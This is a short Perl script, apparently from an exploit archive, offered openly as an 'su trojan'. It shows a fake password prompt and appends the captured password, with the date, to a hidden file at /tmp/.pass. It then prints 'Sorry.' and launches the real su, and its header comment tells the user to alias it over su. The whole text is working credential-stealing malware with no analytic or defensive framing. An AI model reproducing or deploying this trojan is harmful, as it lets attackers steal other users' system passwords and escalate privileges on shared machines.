su trojan written in perl. It reads the password, logging it to a file and then executes the real su.
89ca7aa3ed98d8e1b3d8f8f03e98c74f1253d4a84b02f221c6ed2a6e3c24623c
#!/usr/bin/perl
####################################################################################################
# kyle@freeshell.se 2006 su trojan check so the su path is correct. #
# then make alias for trojan first it reads the pass then exec the real su. #
# logging to /tmp/.pass #
####################################################################################################
print "Password: "; $s1=<STDIN>;
print "Sorry.\n";
$s2="Password is: ";
$s3=`date +%Y-%m-%d`;
open (users, ">>/tmp/.pass") || die ("Could not open file. $!");
print users ($s2, $s1,$s3);
close (users);
system("/bin/su");